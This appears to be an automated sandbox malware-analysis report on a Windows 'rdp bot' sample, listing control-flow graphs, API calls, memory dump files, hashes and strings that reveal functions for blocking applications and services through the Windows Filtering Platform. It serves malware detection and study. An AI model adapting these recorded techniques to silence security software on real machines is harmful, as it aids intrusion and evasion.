614->572 619 7ff66eba9122-7ff66eba9125 615->619 620 7ff66eba9153-7ff66eba9159 615->620 617->572 618->594 622 7ff66eba9140-7ff66eba9146 619->622 623 7ff66eba9127-7ff66eba912a 619->623 624 7ff66eba915f-7ff66eba9165 620->624 625 7ff66eba9239-7ff66eba923e 620->625 628 7ff66eba922f-7ff66eba9234 622->628 629 7ff66eba914c-7ff66eba9151 622->629 626 7ff66eba9130-7ff66eba9133 623->626 627 7ff66eba921b-7ff66eba9220 623->627 630 7ff66eba9243-7ff66eba9248 624->630 631 7ff66eba916b-7ff66eba9171 624->631 625->572 632 7ff66eba9225-7ff66eba922a 626->632 633 7ff66eba9139-7ff66eba913e 626->633 627->572 628->572 629->572 630->572 634 7ff66eba9177-7ff66eba917c 631->634 635 7ff66eba924d-7ff66eba9252 631->635 632->572 633->572 634->572 635->572
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                      • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                      • API String ID: 493744553-3317923414
                                                      • Opcode ID: 052a71c4555acffeaaa4906deb5c7fc5526f27be3c9c1e84582a7bf668648cdc
                                                      • Instruction ID: 81698650db992fd4dc30e0cd30ad1289dd2c2f90f4f85af46ae1e88c2c5003e4
                                                      • Opcode Fuzzy Hash: 052a71c4555acffeaaa4906deb5c7fc5526f27be3c9c1e84582a7bf668648cdc
                                                      • Instruction Fuzzy Hash: 4F517131608BC2C6EB708B15E5843AAB370FB99744F404135EA8D8BB98EF3DD549CB45

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 701 7ff66eba9195-7ff66eba919a 702 7ff66eba90e4-7ff66eba90ec 701->702 703 7ff66eba90f2-7ff66eba9109 GetProcessHeap HeapFree 702->703 704 7ff66eba8e63-7ff66eba8e6b 702->704 703->704 705 7ff66eba8e72-7ff66eba8e82 704->705 707 7ff66eba8da0-7ff66eba8da3 705->707 708 7ff66eba8e88-7ff66eba8e8a 705->708 710 7ff66eba9284-7ff66eba9299 707->710 711 7ff66eba8da9-7ff66eba8db2 FreeLibrary 707->711 708->707 709 7ff66eba8e90-7ff66eba8eca call 7ff66ebaa1f1 708->709 709->705 714 7ff66eba8ecc-7ff66eba8f29 strlen 709->714 711->710 716 7ff66eba8e2e-7ff66eba8e49 call 7ff66eba14e2 714->716 717 7ff66eba8f2f-7ff66eba8f5e 714->717 716->705 721 7ff66eba8f64-7ff66eba8f8d GetProcessHeap HeapAlloc 717->721 722 7ff66eba8e4b-7ff66eba8e5e call 7ff66eba14e2 717->722 724 7ff66eba90a4-7ff66eba90c4 call 7ff66eba14e2 721->724 725 7ff66eba8f93-7ff66eba8fac 721->725 722->704 724->704 730 7ff66eba8fb2-7ff66eba9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 725->730 731 7ff66eba90c9-7ff66eba90df call 7ff66eba14e2 725->731 732 7ff66eba91a9-7ff66eba91da call 7ff66eba795a 730->732 733 7ff66eba906d-7ff66eba9086 call 7ff66eba14e2 730->733 731->702 742 7ff66eba91ef-7ff66eba9205 call 7ff66eba14e2 732->742 743 7ff66eba91dc-7ff66eba91ea LocalFree 732->743 740 7ff66eba910e-7ff66eba9114 733->740 741 7ff66eba908c 733->741 744 7ff66eba9211-7ff66eba9216 740->744 745 7ff66eba911a-7ff66eba9120 740->745 747 7ff66eba919f-7ff66eba91a4 741->747 748 7ff66eba9092-7ff66eba909f 741->748 742->743 743->702 744->702 749 7ff66eba9122-7ff66eba9125 745->749 750 7ff66eba9153-7ff66eba9159 745->750 747->702 748->724 752 7ff66eba9140-7ff66eba9146 749->752 753 7ff66eba9127-7ff66eba912a 749->753 754 7ff66eba915f-7ff66eba9165 750->754 755 7ff66eba9239-7ff66eba923e 750->755 758 7ff66eba922f-7ff66eba9234 752->758 759 7ff66eba914c-7ff66eba9151 752->759 756 7ff66eba9130-7ff66eba9133 753->756 757 7ff66eba921b-7ff66eba9220 753->757 760 7ff66eba9243-7ff66eba9248 754->760 761 7ff66eba916b-7ff66eba9171 754->761 755->702 762 7ff66eba9225-7ff66eba922a 756->762 763 7ff66eba9139-7ff66eba913e 756->763 757->702 758->702 759->702 760->702 764 7ff66eba9177-7ff66eba917c 761->764 765 7ff66eba924d-7ff66eba9252 761->765 762->702 763->702 764->702 765->702
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                      • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                      • API String ID: 493744553-3317923414
                                                      • Opcode ID: b5c7524d6233bc13863bba0be5668a15fec480e53ddebb1f9498f54106728d50
                                                      • Instruction ID: 6d1df855c0bf9d1be5ea2a88da2ec6a98bd2f000192d10ebaea6c9f17c6dd828
                                                      • Opcode Fuzzy Hash: b5c7524d6233bc13863bba0be5668a15fec480e53ddebb1f9498f54106728d50
                                                      • Instruction Fuzzy Hash: 5F517131608BC2C6EB708B15E5843AAB370FB99744F404135EA8D8BB98EF3DD549CB45

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 636 7ff66eba918b-7ff66eba9190 637 7ff66eba90e4-7ff66eba90ec 636->637 638 7ff66eba90f2-7ff66eba9109 GetProcessHeap HeapFree 637->638 639 7ff66eba8e63-7ff66eba8e6b 637->639 638->639 640 7ff66eba8e72-7ff66eba8e82 639->640 642 7ff66eba8da0-7ff66eba8da3 640->642 643 7ff66eba8e88-7ff66eba8e8a 640->643 645 7ff66eba9284-7ff66eba9299 642->645 646 7ff66eba8da9-7ff66eba8db2 FreeLibrary 642->646 643->642 644 7ff66eba8e90-7ff66eba8eca call 7ff66ebaa1f1 643->644 644->640 649 7ff66eba8ecc-7ff66eba8f29 strlen 644->649 646->645 651 7ff66eba8e2e-7ff66eba8e49 call 7ff66eba14e2 649->651 652 7ff66eba8f2f-7ff66eba8f5e 649->652 651->640 656 7ff66eba8f64-7ff66eba8f8d GetProcessHeap HeapAlloc 652->656 657 7ff66eba8e4b-7ff66eba8e5e call 7ff66eba14e2 652->657 659 7ff66eba90a4-7ff66eba90c4 call 7ff66eba14e2 656->659 660 7ff66eba8f93-7ff66eba8fac 656->660 657->639 659->639 665 7ff66eba8fb2-7ff66eba9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 660->665 666 7ff66eba90c9-7ff66eba90df call 7ff66eba14e2 660->666 667 7ff66eba91a9-7ff66eba91da call 7ff66eba795a 665->667 668 7ff66eba906d-7ff66eba9086 call 7ff66eba14e2 665->668 666->637 677 7ff66eba91ef-7ff66eba9205 call 7ff66eba14e2 667->677 678 7ff66eba91dc-7ff66eba91ea LocalFree 667->678 675 7ff66eba910e-7ff66eba9114 668->675 676 7ff66eba908c 668->676 679 7ff66eba9211-7ff66eba9216 675->679 680 7ff66eba911a-7ff66eba9120 675->680 682 7ff66eba919f-7ff66eba91a4 676->682 683 7ff66eba9092-7ff66eba909f 676->683 677->678 678->637 679->637 684 7ff66eba9122-7ff66eba9125 680->684 685 7ff66eba9153-7ff66eba9159 680->685 682->637 683->659 687 7ff66eba9140-7ff66eba9146 684->687 688 7ff66eba9127-7ff66eba912a 684->688 689 7ff66eba915f-7ff66eba9165 685->689 690 7ff66eba9239-7ff66eba923e 685->690 693 7ff66eba922f-7ff66eba9234 687->693 694 7ff66eba914c-7ff66eba9151 687->694 691 7ff66eba9130-7ff66eba9133 688->691 692 7ff66eba921b-7ff66eba9220 688->692 695 7ff66eba9243-7ff66eba9248 689->695 696 7ff66eba916b-7ff66eba9171 689->696 690->637 697 7ff66eba9225-7ff66eba922a 691->697 698 7ff66eba9139-7ff66eba913e 691->698 692->637 693->637 694->637 695->637 699 7ff66eba9177-7ff66eba917c 696->699 700 7ff66eba924d-7ff66eba9252 696->700 697->637 698->637 699->637 700->637
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                      • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                      • API String ID: 493744553-3317923414
                                                      • Opcode ID: e137156efd894a51f6124f7f1d871e399153414ab707446600318c66e0ccb24c
                                                      • Instruction ID: 53a1f5ea9a865a25f7f397bd7e64029bea258d07fef3c4253dd37efdae0bab3b
                                                      • Opcode Fuzzy Hash: e137156efd894a51f6124f7f1d871e399153414ab707446600318c66e0ccb24c
                                                      • Instruction Fuzzy Hash: C0517131608BC2C6EB708B15E5843AAB370FB99744F404135EA8D8BB98EF3DD549CB45

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                      • API String ID: 1004003707-3780280517
                                                      • Opcode ID: 315ba949fec665040c86c14cfdba382cd6e3a68f55e458fd157ca27c3dfdd6b5
                                                      • Instruction ID: 749d37eb3bbfb7398e49f6cf10412e436935e8aa67ba96907ecc32df19877cf7
                                                      • Opcode Fuzzy Hash: 315ba949fec665040c86c14cfdba382cd6e3a68f55e458fd157ca27c3dfdd6b5
                                                      • Instruction Fuzzy Hash: D8413961E49647E2FA608B48FA807F46271FB2A344F488136FA4DCE591DF3DA649D30D

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                      • API String ID: 1004003707-386092548
                                                      • Opcode ID: 60811ac15eee7ed5292fcef168163863ff9bb8dc15cbc46863516350c7bd327a
                                                      • Instruction ID: d30430b345860a353db33fbedbdf42bce565382d1ef859895128a0ef5cc87849
                                                      • Opcode Fuzzy Hash: 60811ac15eee7ed5292fcef168163863ff9bb8dc15cbc46863516350c7bd327a
                                                      • Instruction Fuzzy Hash: D8417FA1E49947D2FE508B08FA807B42271FB2A348F584036F90DCE5D1EE7DA645D30D

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: _errno
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                      • API String ID: 2918714741-1670302297
                                                      • Opcode ID: 7bf6c9a41745675a725e6b14e4249c4cc625627d809daff04cad01ae91eba1b9
                                                      • Instruction ID: 2b5982ccd6589a5410dc05e8d8c0249d75c74beb8765df1683a2193536a1de38
                                                      • Opcode Fuzzy Hash: 7bf6c9a41745675a725e6b14e4249c4cc625627d809daff04cad01ae91eba1b9
                                                      • Instruction Fuzzy Hash: F8216061A08646D6E6619F19EAC07AA3374FB6A784F444036FE4C8B654DF3CD949CB08

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1
                                                      • API String ID: 513531256-1839485796
                                                      • Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                                      • Instruction ID: 35ec4919a2ccf5c0369b89e672fd00b3ab90860e9799bd8f9e7f46f6d73580cd
                                                      • Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                                      • Instruction Fuzzy Hash: 79416261E48642C6F7209B15EA943BA6274FBAE780F840035EA4DCB795DF3CE585C748

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                                                      • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                                                      • API String ID: 1522850966-2029202777
                                                      • Opcode ID: 48a6589deb611d06c9edb1f8e6d9c58bc03904249b7b70e4a3387195757c5765
                                                      • Instruction ID: aebe8440d3db3d690e685024f5933cc0d5cdb60d35cb16dd16adcc162a57bc3d
                                                      • Opcode Fuzzy Hash: 48a6589deb611d06c9edb1f8e6d9c58bc03904249b7b70e4a3387195757c5765
                                                      • Instruction Fuzzy Hash: 8E518431A1CB81C5FB618B1AE5403AA72B6FB59784F004135EA8D8BB99EF3DD444CB84
                                                      APIs
                                                      • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,00000239A82514D0,?,00007FF66EBA14B4,?,?,00000001,00007FF66EBA14D2), ref: 00007FF66EBA9701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Close0EngineFwpmwcscmp
                                                      • String ID: [E] (%s) -> FwpmuserOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                                                      • API String ID: 4239307310-774261742
                                                      • Opcode ID: a834c224ed3b308d03cf7a33da323f19570100c4512a2beaecdd82d4379bef9a
                                                      • Instruction ID: 05b9526febad11aecd7da8be6e194f7f6e0e5ac276b89001b77c01e51b603ff2
                                                      • Opcode Fuzzy Hash: a834c224ed3b308d03cf7a33da323f19570100c4512a2beaecdd82d4379bef9a
                                                      • Instruction Fuzzy Hash: 35318E51B5C643C2FF509AADB6902BA12B1DF6E3C0F500031FA0ECF696EE5DD845A348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: AttributesErrorFileLast
                                                      • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                      • API String ID: 1799206407-4111913120
                                                      • Opcode ID: 6288ba96a2c54b07fc6c23e9f4ae3678dc1dba26fb187c7b6411f3a55125536d
                                                      • Instruction ID: 965fe8b647dfb2ff0895038e7a94c865ad0f37049b4432fd5f298f5f3facda19
                                                      • Opcode Fuzzy Hash: 6288ba96a2c54b07fc6c23e9f4ae3678dc1dba26fb187c7b6411f3a55125536d
                                                      • Instruction Fuzzy Hash: 7821D6E0EAC447C3FF20565C96843793560DF2A70AF208536F11ECE2ECDE5CE885524A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: e53e799cc88bc32a505467fc5252c664ac9aebec5248efd15ce05c3f62491525
                                                      • Instruction ID: 75c9b7e231d80dd15e210c64efd2e260988ca29ad0c077c04bce7996699ec6c3
                                                      • Opcode Fuzzy Hash: e53e799cc88bc32a505467fc5252c664ac9aebec5248efd15ce05c3f62491525
                                                      • Instruction Fuzzy Hash: B9F0A990E48613D2FE518759BA805F55275BF2EBD0F584431FD4C8FBA4EE2CD9468308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastNextProcess32
                                                      • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                      • API String ID: 1692733154-1215713629
                                                      • Opcode ID: 666f7788e003c775c598e45232550bd81855b7980d96f8fff076b2734e9b3f84
                                                      • Instruction ID: d0972ad5ab05a9ee36376c31544fe27b1100fb5e9e48105243a3e0f176dfb3fe
                                                      • Opcode Fuzzy Hash: 666f7788e003c775c598e45232550bd81855b7980d96f8fff076b2734e9b3f84
                                                      • Instruction Fuzzy Hash: 42F03751E48A43D6FE24675CEAD817812B1EF6F744F808032E40ECF6A5EE6CE944830D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastNextProcess32
                                                      • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                      • API String ID: 1692733154-1215713629
